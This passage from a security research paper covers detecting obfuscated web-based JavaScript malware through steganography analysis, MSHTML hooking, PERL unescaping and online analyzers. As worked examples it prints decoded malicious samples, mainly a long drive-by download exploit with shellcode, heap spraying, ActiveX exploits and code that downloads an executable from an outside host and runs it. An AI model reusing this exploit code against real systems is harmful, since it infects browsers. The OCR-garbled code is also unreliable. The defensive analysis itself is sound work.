"eval()" or "document.write()" in any part of the code.
Second, the payload is encoded using spaces (representing
bit-wise 0) and tabs (bit-wise 1) and appended
after each line of code of the carrier. No matter what
payload is embedded, the result is always a run of spaces
and tabs at the end of each carrier line. Therefore, the
payload is not disclosed visually under manual inspection,
because spaces and tabs appear "transparent" in most
text editors / viewers. A careful inspector can "select"
the javascript, causing the spaces and tabs to be
highlighted and therefore reflect a visual
representation of the payload:
Kolisar's WSO is a new threat because it isn't just
obfuscation, it's steganography. Quoting Wikipedia:
"Steganography is the art and science of writing
hidden messages in such a way that no one apart
from the sender and intended recipient even realizes
there is a hidden message." However, up to now, we
have only researched obfuscation / steganography
algorithms where the payload and the carrier reside in
the same file and exist in the same format: text. With
today's ajax support by browsers, javascripts can get a
lot more nasty.
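
The whitespace encoding described above can be sketched in a few lines of Python. This is only an illustration of the idea (space = 0 bit, tab = 1 bit, eight bits per character, appended to the end of each carrier line), not Kolisar's encoder. The function names and the chars_per_line parameter are assumptions made for this example, and the payload is assumed to contain only 8-bit characters.

```python
def ws_encode(payload, carrier_lines, chars_per_line):
    """Hide payload in trailing whitespace: space = 0 bit, tab = 1 bit."""
    if len(payload) > chars_per_line * len(carrier_lines):
        raise ValueError("carrier has too few lines for this payload")
    encoded = []
    for n, line in enumerate(carrier_lines):
        # Each carrier line carries up to chars_per_line payload characters.
        chunk = payload[n * chars_per_line:(n + 1) * chars_per_line]
        bits = "".join(format(ord(ch), "08b") for ch in chunk)
        hidden = bits.replace("0", " ").replace("1", "\t")
        encoded.append(line.rstrip(" \t") + hidden)
    return encoded


def ws_decode(lines):
    """Recover the payload from the trailing spaces and tabs of each line."""
    chars = []
    for line in lines:
        tail = line[len(line.rstrip(" \t")):]
        # Read the trailing whitespace eight symbols at a time.
        for k in range(0, len(tail) - len(tail) % 8, 8):
            byte = tail[k:k + 8].replace(" ", "0").replace("\t", "1")
            chars.append(chr(int(byte, 2)))
    return "".join(chars)
```

Stripping the trailing whitespace from the encoded lines gives back the carrier unchanged, which is why the payload is invisible in most editors until the text is selected.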

We summarize this section by listing the reasons that
make detection of Web-based malware difficult:

1. Speed considerations and strict time constraints
have forced gateway devices and anti-virus solutions
to rely on signature-based pattern matching
technologies. Such technologies have difficulties
detecting Web-based malware because:

A. The nature of interpreted script languages, where
generation of executable code at runtime is the norm,
causes pattern-based approaches to fail.

B. Time constraints prevent gateway devices and
anti-virus solutions from adopting behavior-based
technologies, even if they have them.

2. Because script languages only exist in source
code format (no binary executables), obfuscation is
a widely adopted measure for intellectual property
protection. Compression is also widely adopted for
optimization purposes. Therefore, unlike on Windows,
Web-based malware detection mechanisms cannot
assume that all obfuscated code is malicious.
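
Point 1.A can be illustrated with a small Python sketch. It assumes a single hypothetical signature string and a deliberately simple normalizer that only folds adjacent double-quoted string literals joined by "+". Real scanners and real obfuscation are far more involved, so this is a toy model of the problem rather than a detection method.

```python
import re

# Hypothetical signature, chosen only for this illustration.
SIGNATURE = "document.write"

# Matches "abc" + "def" so the two literals can be merged into "abcdef".
_CONCAT = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')


def naive_match(script):
    """Plain substring search, as a signature-based scanner would do."""
    return SIGNATURE in script


def fold_string_concats(script):
    """Repeatedly merge adjacent string literals joined by '+'."""
    previous = None
    while previous != script:
        previous = script
        script = _CONCAT.sub(
            lambda m: '"' + m.group(1) + m.group(2) + '"', script)
    return script


obfuscated = 'eval("docu" + "ment.wr" + "ite(payload)")'
print(naive_match(obfuscated))                       # signature is split up
print(naive_match(fold_string_concats(obfuscated)))  # visible after folding
```

The string the interpreter finally executes never appears literally in the source, so a pattern has to be matched against what the script generates at runtime rather than against the file as delivered.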

Detection Techniques 

1. The Assembly Way - Tracing JavaScript Obfuscation Parameters

It is always a good approach to go to the source of
the objects in order to trace their functionality.
JavaScript that has been obfuscated for any purpose
must be de-obfuscated before it can execute. We have
relied on this fact extensively in our analysis.
In order to understand the working behavior, certain
facts need to be considered:

1. All HTML operations in the browser, i.e. rendering
various objects, require a specific library that exports
the functions used for execution. For example,
Internet Explorer primarily uses MSHTML.DLL for
rendering content in the browser, which means the
functions used for rendering and execution
are located inside it. It is always better to be
acquainted with the base libraries used for rendering
DOM objects and other HTML tags.

2. Understanding the holistic functionality of
the obfuscated script. If an analyst is able to recognize
certain calls, such as DOM object execution, IFRAMES,
etc., it indirectly helps to trace those functions in
the assembly when reverse engineering is carried out.

3. Most major malware uses IFRAMES or DOM
functions such as document.write in combination
with obfuscated scripts.

This technique is simple: it relies on the interpreter's
own functionality to de-obfuscate the script for
execution in the context of the browser. The
technique is browser specific, but with a specific set of
changes it works efficiently on different platforms.
IE has been chosen for this analysis because it is the
most exploited browser in the wild.

Example Working 

A possible obfuscated script is detected as 
During execution, it is discovered that
the script makes calls to DOM functions such as
document.write. The main point of the analysis is to hook
the required function in order to trace the obfuscated
code in real time. Disassembling MSHTML.DLL and
tracing the document.write method yields the code
presented below:
    775E524A ; Attributes: bp-based frame
    775E524A ; int __stdcall CDocument::write(int, SAFEARRAY *psa)
    775E524A var_18    = dword ptr -18h
    775E524A var_14    = dword ptr -14h
    775E524A var_10    = dword ptr -10h
    775E524A var_C     = dword ptr -0Ch
    775E524A rgIndices = dword ptr -8
    775E524A var_4     = dword ptr -4
    775E524A psa       = dword ptr  0Ch


The DOM function receives a pointer to a SAFEARRAY
data structure (SAFEARRAY *psa) as an argument.
Let us look at the SAFEARRAY structure.

The SAFEARRAY Structure 

When converted to C++ and trimmed of excess 
typedefs and conditionals, the SAFEARRAY structure 
looks something like this: 

    struct SAFEARRAY {
        WORD cDims;
        WORD fFeatures;
        DWORD cbElements;
        DWORD cLocks;
        void * pvData;
        SAFEARRAYBOUND rgsabound[1];
    };

• The cDims field contains the number of dimensions
of the array.

• The fFeatures field is a bitfield indicating attributes
of a particular array. (More on that later.)

• The cbElements field defines the size of each
element in the array.

• The cLocks field is a reference count that indicates
how many times the array has been locked. When
there is no lock, you're not supposed to access the
array data.

• The pvData field points to the actual array data.

• The last field is an array of boundary structures. By
default, there's only one of these, but if you define
multiple dimensions, the appropriate system function
will reallocate the array to give you as many
array elements as you need. The dimension array is
the last member of the structure so that it can expand.

A SAFEARRAYBOUND structure looks like this:

    struct SAFEARRAYBOUND {
        DWORD cElements;
        LONG lLbound;
    };
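
To make the layout concrete, the two structures can be mirrored with Python's ctypes module. This is a sketch under stated assumptions: the field types follow the trimmed C++ declarations above, the helper read_elements is a name invented for this example, and only a one-dimensional array is handled.

```python
import ctypes


class SAFEARRAYBOUND(ctypes.Structure):
    _fields_ = [("cElements", ctypes.c_uint32),   # DWORD: element count
                ("lLbound", ctypes.c_int32)]      # LONG: lower bound


class SAFEARRAY(ctypes.Structure):
    _fields_ = [("cDims", ctypes.c_uint16),       # WORD: number of dimensions
                ("fFeatures", ctypes.c_uint16),   # WORD: attribute bitfield
                ("cbElements", ctypes.c_uint32),  # DWORD: size of one element
                ("cLocks", ctypes.c_uint32),      # DWORD: lock count
                ("pvData", ctypes.c_void_p),      # pointer to the array data
                ("rgsabound", SAFEARRAYBOUND * 1)]


def read_elements(sa):
    """Return the raw bytes of each element of a one-dimensional SAFEARRAY."""
    if sa.cDims != 1:
        raise ValueError("this sketch only handles one dimension")
    count = sa.rgsabound[0].cElements
    raw = ctypes.string_at(sa.pvData, count * sa.cbElements)
    size = sa.cbElements
    return [raw[k * size:(k + 1) * size] for k in range(count)]
```

In a debugger the same walk applies: read cbElements and the bound, then follow pvData to reach the element data.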



The structure contains a pvData pointer, which points
to another structure, presented below:

    typedef struct _UNICODE_STRING {
        USHORT Length;
        USHORT MaximumLength;
        PWSTR Buffer;
    } UNICODE_STRING;

Length: Specifies the length, in bytes, of the string
pointed to by the Buffer member, not including the
terminating NULL character, if any.

MaximumLength: Specifies the total size, in bytes, of
memory allocated for Buffer. Up to MaximumLength
bytes may be written into the buffer without
trampling memory.

Buffer: Pointer to a wide-character string. Note that
the strings returned by the various functions might
not be null terminated.

The PWSTR Buffer used in the above assembly is
the pointer to the de-obfuscated script. Using this
technique, it is easy to monitor the buffer in real time
and trace the JavaScript rendered in the
browser itself. The technique does not depend on the
complexity of the obfuscation, but rather on tracing
that is inherent to the real environment.
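
The following Python sketch shows how such a counted wide-character string could be read once the structure has been located. It assumes a 32-bit layout (two USHORT fields followed by a 4-byte pointer) and a caller-supplied read_memory(address, size) callback standing in for a debugger's memory read. Both the function name and the callback are hypothetical.

```python
import struct


def read_unicode_string(header, read_memory):
    """Decode a counted wide string from its 8-byte (32-bit) header.

    header      -- raw bytes of the structure: Length, MaximumLength, Buffer
    read_memory -- hypothetical callback: read_memory(address, size) -> bytes
    """
    length, maximum_length, buffer_ptr = struct.unpack("<HHI", header[:8])
    # Length is in bytes and excludes any terminator, so read exactly that
    # many bytes instead of scanning for a NULL character.
    raw = read_memory(buffer_ptr, length)
    return raw.decode("utf-16-le")
```

Because the buffer may not be null terminated, the Length field is what bounds the read, not a search for a terminator.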

2. PERL based Holistic Obfuscated Code Detection

PERL is another powerful tool for analyzing and
decoding code from the perspective of malware and
security analysis. PERL is very robust at performing
operations on regular expressions and string
conversion. This functionality comes in handy when
analyzing obfuscated code to some level.
PERL URI Escape Module 

This module provides functions to escape and unescape URI
strings as defined by RFC 2396 (and updated by RFC
2732). A URI consists of a restricted set of characters,
denoted as uric in RFC 2396. The restricted set of
characters consists of digits, letters, and a few graphic
symbols chosen from those common to most of the
character encodings and input facilities available to
Internet users.

More: http://search.cpan.org/~gaas/URI-1.51/URI/Escape.pm

Try out with different options. 

We primarily use this technique to detect and trace
a target system whose address is directly encoded in the
script. The only solution is to unescape the code in order
to reveal the malware domain. Our analysis relied on this
heavily. A suitable example demonstrates it.
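
The same idea can be sketched in Python with the standard urllib.parse module in place of the PERL URI::Escape module. The sample string and the host name malware.example are made up for this illustration, and hosts_in_escaped is a hypothetical helper name.

```python
import re
from urllib.parse import unquote, urlsplit


def hosts_in_escaped(blob):
    """Unescape a %XX-encoded blob and list the hosts of any URLs inside."""
    text = unquote(blob)
    urls = re.findall(r"https?://[^\s\"'<>]+", text)
    return [urlsplit(u).hostname for u in urls]


# Hypothetical escaped fragment hiding an IFRAME that points at a remote host.
sample = ("%3Ciframe%20src%3D%22http%3A%2F%2Fmalware.example%2Fx.php%22"
          "%3E%3C%2Fiframe%3E")
print(unquote(sample))
print(hosts_in_escaped(sample))
```

Once the text is unescaped, the domain that the script tries to hide becomes an ordinary string that can be searched, logged or blocked.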
Example: Let's apply this check to a sample.

Check 1: The obfuscated code



%3C%68%74%6D%6C%3E%0A%3C%69%66%72%61%6D%65
%20%73%72%63%3D%22%70%61%6C%73%75%2E%70%68%70%22
%20%6E%61%6D%65%3D%22%66%61%6B%65%22%20
%20%3E%3C%2F%69%66%72%61%6D%65%3E%20
%0A%3C%73%63%72%69%70%74%20%74%79%70%65
%3D%22%74%65%78%74%2F%6A%61%76%61%73%63
%72%69%70%74%22%3E%0A%66%75%6E%63%74%69
%6F%6E%20%6D%79%73%74%79%6C%65%28%29%20
%7B%0A%20%20%20%20%69%66%20%28%66%61%6B%65
%2E%64%6F%63%75%6D%65%6E%74%2E%73%74%79%6C
%65%53%68%65%65%74%73%2E%6C%65%6E%67%74%68
%20%3D%3D%20%31%20%29%20%0A%09%7B%0A%20
%20%20%20%20%20%66%20%3D%20%64%6F%63%75
%6D%65%6E%74%2E%66%6F%72%6D%73%5B%22
%62%61%73%69%63%73%74%79%6C%65%22%5D%2E
%65%6C%65%6D%65%6E%74%73%3B%0A%20%20%20%20
%20%20%66%6F%72%20%28%6A%20%3D%20%30%3B%20
%6A%20%3C%20%66%2E%6C%65%6E%67%74%68%3B%20
%6A%2B%2B%29%20%0A%09%20%20%09%7B%0A%20
%20%20%20%20%20%20%09%69%66%20
%28%66%5B%6A%5D%2E%6E%61%6D%65%20%3D%3D%20
%27%66%73%6D%61%69%6E%27%29%3B%0A%20%20%20
%20%20%20%09%7D%20%20%0A%20%20%20%20%20%20
%7D%0A%0A%20%7D%0A%6D%79%73%74%79%6C%65%28%29
%3B%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F
%68%74%6D%6C%3E%0



Check 2: Double Layer Encoding - Layered 
Obfuscation 



A very effective technique is to unescape the
code. Let's do that with PERL. The code is put
into a file called temp.txt.



[Screenshot: temp.txt is piped to perl, which loads the
URI::Escape module and prints uri_unescape of each line.
The decoded output reads:]

    <html>
    <iframe src="palsu.php" name="fake"  ></iframe>
    <script type="text/javascript">
    function mystyle() {
        if (fake.document.styleSheets.length == 1 )
        {
          f = document.forms["basicstyle"].elements;
          for (j = 0; j < f.length; j++)
            {
            if (f[j].name == 'fsmain');
            }
          }

     }
    mystyle();
    </script>
    </html>



The decoded code appears to be a server-side
infectious PHP exploit. This is a simple example; the code
can also be encoded in more than one layer. If a single
unescape iteration shortens the code but still leaves
escape sequences, keep iterating until the original
source is reached. Let's analyze.
[Figure: the layered sample, a long run of escape
sequences of the form %25%37%34...]



On running the same set of commands, the code shrinks
to about half its length. Let's have a look.




This indicates that the first unescape iteration
works fine. Let's try the second iteration.



[Screenshot: the output of the first iteration is piped
through perl with the URI::Escape module a second time.]



At last the test is successful, and it shows that a
wordpress exploit was obfuscated in the sample. The code
is fully decoded after the second iteration.
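
The iteration can be automated. The Python sketch below keeps unescaping until the text stops changing and reports how many layers were removed. The function name and the max_rounds safety limit are assumptions of this example, and urllib.parse stands in for the PERL module used above.

```python
from urllib.parse import quote, unquote


def unescape_layers(blob, max_rounds=10):
    """Unescape repeatedly until a fixed point; return (text, rounds used)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(blob)
        if decoded == blob:
            # Nothing left to unescape: the previous round reached the source.
            break
        blob = decoded
        rounds += 1
    return blob, rounds


# Build a double-escaped sample to exercise the loop.
original = "<script>alert(1)</script>"
layered = quote(quote(original, safe=""), safe="")
print(len(layered), len(original))
print(unescape_layers(layered))
```

One caveat: if the original script legitimately contains a literal %XX sequence, the loop will decode that too, so the output of the last rounds deserves a manual look.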

As mentioned previously, PERL with regular expressions
also supports more advanced analysis, such as
replacing the content of a file or decoding the file byte
by byte by specifying the character length.
Some generic PERL command line one-liners follow.
Try them and look up the functionality of each.

    # decode base64 input
    perl -MMIME::Base64 -ne 'print decode_base64($_)' <file

    # encode a whole file as base64
    perl -MMIME::Base64 -0777 -ne 'print encode_base64($_)' <file

    # replace every %XX escape with the character it encodes
    perl -pe 's/%([0-9A-F]{2})/chr(hex($1))/ieg;'

    # convert UTF-16 input to UTF-8 output
    perl -Mencoding=utf16,STDOUT,utf8 -n -e print < in > out

    perl -Mencoding=utf16,STDOUT,utf8 -p -e 1 < in > out

    # write a single character, given by code point, to a file
    perl -C -Mutf8 -e "print qq(\x{83})" >d.txt

This technique is very helpful. Perl is a good, clean
working tool and every analyst should give it a try.
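
For readers who prefer Python, rough equivalents of three of these one-liners are sketched below using only the standard library. The function names are invented for this example, and the behaviour is meant to be comparable to the PERL commands rather than byte-for-byte identical.

```python
import base64
import re


def decode_base64_text(text):
    """Counterpart of the decode_base64 one-liner."""
    return base64.b64decode(text)


def decode_percent_hex(text):
    """Counterpart of s/%([0-9A-F]{2})/chr(hex($1))/ieg."""
    return re.sub(r"%([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1), 16)), text)


def utf16_to_utf8(data):
    """Counterpart of the UTF-16 to UTF-8 conversion one-liners."""
    return data.decode("utf-16").encode("utf-8")


print(decode_base64_text("YWxlcnQoMSk="))
print(decode_percent_hex("%3Cb%3e"))
```

Each helper does one transformation, so they can be chained in whatever order a layered sample requires.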

3. Obfuscated Hybrid Code Detection 

Obfuscation does not end with escaping and
generic encoders. Obfuscation is also hybrid nowadays.
There can be a scenario in which two scripting
languages are used together, or a single scripting
language is used with other custom encoders.
The analysis has to scrutinize the dependency
between the scripting languages and the custom
encoders. Let's analyze the script below.



The obfuscated code above is built from two
different modules. The presence of the "%" character
suggests that the code may be escaped.
The second function does not look like escaped
code. Let's apply the PERL technique discussed
previously to see what we can decode.




The decoded part is



    document.write(unescape('<script language="javascript">function
    exploit_hell(s){var s1=unescape(s.substr(0,s.length-1)); var
    t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.
    charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</
    script>'));

The main point is to find the code passed to the exploit_hell
function. But this code seems to have been packed with
some custom encoder. In order to look into that part, an
automated de-obfuscating code analyzer has to be used.
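
The logic of exploit_hell itself is short enough to re-implement outside the browser. The Python sketch below follows the decoded JavaScript step by step: the last character of the argument is a digit used as a key, the rest is unescaped, every character code is reduced by the key, and the result is unescaped again. It returns the text instead of writing it to the document. The encoder is a hypothetical inverse added only to exercise the decoder, and %uXXXX escapes (which JavaScript's unescape also accepts) are not handled.

```python
from urllib.parse import quote, unquote


def exploit_hell_decode(s):
    """Python rendering of the decoded exploit_hell(s) routine."""
    key = int(s[-1])                            # s.substr(s.length-1, 1)
    s1 = unquote(s[:-1], encoding="latin-1")    # unescape(s.substr(0, ...))
    shifted = "".join(chr(ord(ch) - key) for ch in s1)
    return unquote(shifted, encoding="latin-1")  # unescape(t)


def exploit_hell_encode(plain, key):
    """Hypothetical inverse of the decoder, for testing (key is 1..9)."""
    inner = quote(plain, safe="")
    shifted = "".join(chr(ord(ch) + key) for ch in inner)
    return quote(shifted, safe="", encoding="latin-1") + str(key)
```

Running the decoder offline gives the same text the browser would have written into the page, without executing any of it.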

1. SpiderMonkey: SpiderMonkey is Gecko's
JavaScript engine written in C. It is used in various
Mozilla products, including Firefox, and is available
under the MPL/GPL/LGPL tri-license.

Download: https://developer.mozilla.org/en/SpiderMonkey

2. Caffeine Monkey: The tool unmasks what the
code is actually doing and allows researchers to create
algorithms/functions to classify it in whatever way they
might want to. One of the key components of this
tool is that it is behavior based, not signature based.
It identifies specific behaviors that are indicative of
malicious code.

Download: http://www.secureworks.com/research/tools/caffeinemonkey.html

The tools above can do the trick. JavaScript
analyzers are handy for analyzing many custom
obfuscated scripts. The obfuscated code should
be placed in a file with a .js extension and passed as a
parameter to the JavaScript engine for execution.

The code behind the exploit_hell function is
presented below.



[Figure: listing of the exploit_hell code]
It clearly explains how the malware works.

4. Web Based Real Time Dynamic Detection of 
Obfuscated Code 

For analyzing very complex code, it is always
preferable to try automated or online obfuscation
scanners, because in a real-time environment time is a
critical factor. Nevertheless, we stress all of the
techniques, because each one works efficiently at a
certain point. Let's try an online web malware analysis tool.

Wepawet: Wepawet is a service for detecting and
analyzing web-based malware. It currently handles Flash
and JavaScript files. Wepawet runs various analyses
on the URLs or files that you submit. At the end of
the analysis phase, it tells you whether the resource is
malicious or benign and provides you with information
that helps you understand why it was classified
one way or the other. Wepawet displays various pieces of
information that greatly simplify the manual analysis
and understanding of the behavior of malicious
samples. For example, it gives access to the
unobfuscated malicious code used in an attack.
Alpha Release: http://wepawet.iseclab.org/index.php



The suitability of WEPAWET is shown with the
example below:

[Figure: the obfuscated sample submitted to WEPAWET]







The code looks really bad at first glance. But when
it is analyzed with WEPAWET it shows another face.
The advantage of online and automated
JavaScript analyzers is that it becomes easy to trace
known exploit code if any malware uses it. Let's
see:



[Figure: WEPAWET analysis report for the sample]



Without a doubt, this is an exploit used for
drive-by download infection.
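
A quick way to triage output of this kind is to turn the %uXXXX escapes of the shellcode string into raw bytes and look for printable strings. The Python sketch below is one possible approach. The helper names are assumptions of this example, and the sample is the run of ten words from the tail of the shellco string in the decoded script reproduced after this sketch.

```python
import re


def decode_percent_u(escaped):
    """Turn %uXXXX escapes into bytes; each word is stored low byte first."""
    out = bytearray()
    for word in re.findall(r"%u([0-9A-Fa-f]{4})", escaped):
        value = int(word, 16)
        out += bytes((value & 0xFF, value >> 8))
    return bytes(out)


def printable_strings(blob, min_len=6):
    """List runs of printable ASCII of at least min_len bytes."""
    runs = re.findall(rb"[\x20-\x7e]+", blob)
    return [r.decode("ascii") for r in runs if len(r) >= min_len]


tail = "%u7468%u7074%u2F3A%u752F%u6470%u7461%u7A65%u692E%u666E%u2F6F"
print(decode_percent_u(tail))
```

The bytes spell out the start of the download URL, which shows that the shellcode carries its own copy of the address that the script also assigns to the url variable.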
The decoded script is 

var url = 'http : / /updatez . inf o/etc/getexe . exe?o=l & 
t=1204152273&i=2204827752&e=' ; var shellco = 
> %u54EB%u758B%u8B3C + > %u3574%u0378%u56F5%u768B' 
+ > %u0320%u33F5%u49C9%uAD41' + 
> %uDB33%u0F36%ul4BE%u3828' + 
> %u74F2%uC108%uODCB%uDA03' + 
> %uEB40%u3BEF%u75DF%u5EE7' + 
> %u5E8B%u0324%u66DD%u0C8B' + 
> %u8B4B%ulC5E%uDD03%u048B' + 
> %u038B%uC3C5%u7275%u6D6C + 
> %u6E6F%u642E%u6C6C%u2e00' + 
> %u5C2e%u2e7e%u7865%u0065' + 
> %uC033%u0364%u3040%u0C78' + 
> %u408B%u8B0C%ulC70%u8BAD' + 
> %u0840%u09EB%u408B%u8D34' + 

> %u7C40%u408B%u953C%u8EBF' + * %uOE4E%uE8EC%uFF8 4%u 
FFFF%uEC83%u8304' + * %u2 42C%uFF3C%u95D0%uBF5 0 ' + 
> %ulA36%u702F%u6FE8%uFFFF' + 
> %u8BFF%u2454%u8DFC%uBA52' + 
> %uDB33%u5353%uEB52%u5324' + 
> %uD0FF%uBF5D%uFE98%u0E8A' + 
> %u53E8%uFFFF%u83FF%u04EC + 
> %u2C83%u6224%uD0FF%u7EBF' + 

> %uE2D8%uE873%uFF40%uFFFF' + * %uFF52%uE8D0%uFFD7% 
uFFFF%u7 4 68%u7 07 4%u2F3A%u7 52F%u647 0%u7 4 61%u7A65%u6 
92E%u6 66E%u2F6F%u7 4 65 %u2F63%u65 67%u657 4%u657 8%u65 
2E%u657 8%u6F3F%u313D%u742 6%u313D%u3032%u3134%u32 35 
%u37 32%u2 633 %u3D69%u32 32%u34 30%u32 38%u37 37%u32 35% 
u652 6%u2 03D' ; var nop = ^90', success = 0; var 
exeurl = url + ; function Create0(o, n) { var 
r = null; try { r = o . CreateOb j ect (n) } 

catch (e) { } if (!r){ try { r = 

o . CreateOb j ect (n, } catch (e) { } 

} if (!r){ try { r = o . CreateOb j ect (n, 

} catch (e) { } } if (!r) { 

try { r = o . GetOb j ect ( , n) } catch 

(e) { } } if (!r) { try { r = o. 

Get0bject(n, } catch (e) { } } 

if (!r){ try { r = o . GetOb j ect (n) } 

catch (e) { } } return (r) ; } function 

Go (a) { var fso = a . CreateOb j ect ("Scri" + "pting. 
File" + "Sys" + "temOb" + "ject", "")var sap = 
Create0(a, "She" + "ll.Applic" + "ation"); var 
nl = null; fname = "filel51.exe"; fname = fso. 
BuildPath ( f so . GetSpecialFolder (2) , fname); try { 
nl = Create0(a, "Micr" + "osoft.XMLH" + "TTP") ; 
nl . open ("GET", exeurl, false); } catch (e) { 
try { nl = Create0(a, "MSX" + "ML2.XMLH" + 






"TTP") ; nl . open ("GET", exeurl, false); } 

catch (e) { try { nl = CreateO(a, 

"MSX" + "ML2 . ServerX" + "MLHTTP" ) ; nl . 

open ("GET", exeurl, false); } catch 

(e) { try { nl = new 

XMLHttpRequest ( ) ; nl . open ( "GET" , exeurl, 

false) ; 

} catch (e) { return 0; } 

} } } nl . send (null) ; rb = nl . 

responseBody ; var x = CreateO(a, "ADO" + "DB. 
Str" + "earn"); x.Type = 1; eval("x." + repl[0] 
+ "=3;x." + repl[l] + "();x." + repl[2] + 
"(rb);x." + repl[3] + " ( f name , 2 ) ; sap . " + repl[4] 
+ "(fname);"); return 1; } var repl = new 
Array ("Mo" + "de", "Op" + "en", "Wr" + "ite", "Sa" 
+ "veTof" + "ile", "She" + "llEx" + "ecute") ; 
function mdac () { var i = 0; var target = new 
Array("BD96" + "C556-65A3-11D0-983A-00C04F" + 
"C29E36", "BD96" + "C556-65A3-11D0-983A-00C04F" 
+ "C29E30", "AB9B" + "CEDD-EC7E-47E1-9322-D4A210" 
+ "617116", "0006" + "F033-0000-0000-C000- 
000000" + "000046", "0006" + "F03A-0000-0000- 
C000-000000" + "000046", "6e32" + "070a-766d-4ee6- 
879c-dclfa9" + "Id2fc3", "6414" + 

"512B-B978-451D-A0D8-FCFDF3" + "3E833C", "7F5B" + 
"7F63-F06F-4331-8A26-339E03" + "C0AE3D", "0672" + 
"3E09-F4C2-43c8-8358-09FCDl" + "DB0766", "639F" 
+ "725F-1B2D-4831-A9FD-874847" + "682010", "BA01" 
+ "8599-lDB3-44f 9-83B4-461454" + "C84BF8", 
"D0C0" + "7D56-7C69-43F1-B4A0-25F5A1" + 
"1FAB19", "E8CC" + "CDDF-CA28-496b-B050-6C07C9" + 
"62476B", null); while (target [i]){ var a = 

null; 

a = document . createElement ("object") ; a. 
setAttribute ("classid", "clsid:" + target [i]); 
if (a) { try { var b = CreateO(a, 

"Sh" + "ell.Appl" + "ication") ; if (b) { 

if (Go (a) ) return 1; } } catch 

(e) { } } i++; } } if (mdac() ) 

success = 1; if (! success) { document, 
write ( "<script language=VBScript>\r\n" + 'Set 
elem=document . createElement ( "obj ect" ) ' + "\r\n" + 
' f name="f ile234 . exe" ' + "\r\n" + 'elem. 
setAttribute "id", "elem"' + "\r\n" + 'elem. 
setAttribute "classid" , "clsid : BD96 ' + 'C556- 
65A3-11D0-983A-00C04F' + 'C29E36'" + "\r\n" + 'Set 
obj=elem.CreateObject ("She' + 'll.Appli' + 
'cation","")' + "\r\n" + "Set nsp=obj . 
NameSpace (20 ) \r\n" + 'Set pnm=nsp. 
ParseName ("Symbol . ttf") ' + "\r\n" + 
'tmp=Split (pnm. Path, "\\", -1, 1) ' + "\r\n" + 
'path=tmp(0) & "\\" & tmp(l) & "W" + "\r\n" + 
"fname=path & fname\r\n" + 'set tpqpd=CreateOb j e 
ct ("Micr"+"osoft . XML"+"HTTP" ) ' + "\r\n" + 
'iiqu=tpqpd. ' + repl[l] + '( "GET" , exeurl , 0 ) ' + 
"\r\n" + "tpqpd . Send ( ) \r\n" + "On Error Resume 
Next\r\n" + "egsyho=tpqpd . responseBody\r \n" + 
'Set acvqqrp=elem. CreateObject ("Scri' + 'pting. 
FileSyst' + 'emOb j ect" , " " ) ' + "\r\n" + "Set 
kld=acvqqrp . CreateTextFile (fname, TRUE) \r\n" + 
"lotzom=LenB (egsyho) \r\n" + "For j=l To lotzom\ 
r\n" + "plkosl=MidB (egsyho, j , 1 ) \r\n" + 
"qamplxd=AscB (plkosl ) \r\n" + "kid. 
Write (Chr (qamplxd) ) \r\n" + "Next\r\n" + "kid. 
Close\r\n" + 'Set yipt=elem. CreateOb j ect ("WScr ' 
+ ' ipt . Shell" ,"") ' + "\r\n" + "On Error Resume 
Next\r\n" + "yipt.Run fname, 1 , FALSE\r\n" + '<\/ 
script>' ) ; } if (! success) { exeurl = url + '9'; 
document . write ( '<object 
classid="clsid: 5 9DBDDA6-9A8 0-42A4-B82 4- 
9BC50CC172F5" id=" test "></ob j ect>' ) ; try { 
test . DownloadFile (exeurl , "..\\~tmp0001.exe", "0", 



"0") ; document . location = "exploits/x9 . 

php?zenturi=l" ; 

} catch (e) { } } if (! success) { var hstoaddr 
= 0x05050505; var mystring = unescape ( shellco + 
'%u2033'); var hbsize = 0x400000; var plsize = 
mystring . length * 2; var spslsize = hbsize - 
(plsize + 0x38); var spsl = unescape ("%u" + nop 
+ nop + "%u" + nop + nop); while (spsl. length * 
2 < spslsize) { spsl += spsl } spsl = spsl. 

substring (0, spslsize / 2); hblocks = (hstoaddr 

- 0x400000) / hbsize; memory = new Array (); 
for (i =0; i < hblocks; i ++ ) { memory[i] = 
spsl + mystring } var ssrt = ' method="' ; 
for (i =0; i < 10437; i ++ ) { ssrt += 
'ԅ' } document . write ( ' <html 

xmlns : v="urn : schemas -micro so f t-com : vml"Xob j ect 
id="VMLRender" classid="CLSID : 1 0072C EC-8CC1-11D1- 
98 6E-0 0A0C955B42E"X/object><style>v\\ : * {behavior : 
url (#VMLRender) ; }</style><v : rect 
style="width: 120pt;height : 80pt" 
f illcolor="red"Xv : f ill' + ssrt + 
' "x/v : rectx/v : f ill>' ) ; } if (! success) { var 
mystring = '%u' + nop + nop + shellco + '%u2032'; 
while (mystring . length < 3072) { mystring += 

'%u' + nop + nop } ; mystring = 
unescape (mystring) ; var bigb = 
unescape ("%u0c0c") ; while (bigb. length <= 
0x100000) { bigb += bigb } var memory = new 

Array (); for (var i = 0; i < 120; i ++ ) { 
memory [i] = bigb . subs tring ( 0 , 0x100000 - mystring. 
length) + mystring } var repl = new 
Array("Web", "View", "Folder", "Icon"); var wvfi 
= repl[0] + repl[l] + repl [2] + repl [3] + '.' + 
repl[0] + repl[l] + repl [2] + repl [3] + '.1'; 
for (var i = 0; i < 1024; i ++ ) { var wvfio = 

new ActiveXObj ect (wvfi ) ; eval ("try {wvfio . sets" 

+ "lice (0x7ffffffe, 0, 0, 2 02116108) ; } catch (e) { }") ; 
var wvfit = new ActiveXObj ect (wvfi ) ; } } if 
( [success) { document . write ( "<object 
classid=' clsid:DCE2F8Bl-A52 0-HD4-8FD0- 
00D0B7730277' id=' target 1 ' x/obj ect>" ) ; 
document . write ( "<ob j ect 
classid=' clsid: 9D3 922 3E-AE8E-1 1D4- 8FD3- 
00D0B7730277' id=' target2 ' x/obj ect>" ) ; var 
mystring = unescape ( shellco + '%u3031'); 
bigblock = unescape ( "%u" + nop + nop + "%u" + nop 
+ nop); slspace = 20 + mystring . lengthwhile 
(bigblock . length < slspace) bigblock += bigblock; 
fillblock = bigblock . substring ( 0 , slspace); 
block = bigblock . substring ( 0 , bigblock . length 

- slspace); while (block . length + slspace < 
0x40000) block = block + block + fillblock; 
memory = new Array () ; for (x = 0; x < 80 0; x ++ 
){ memory[x] = block + mystring } buffer = 
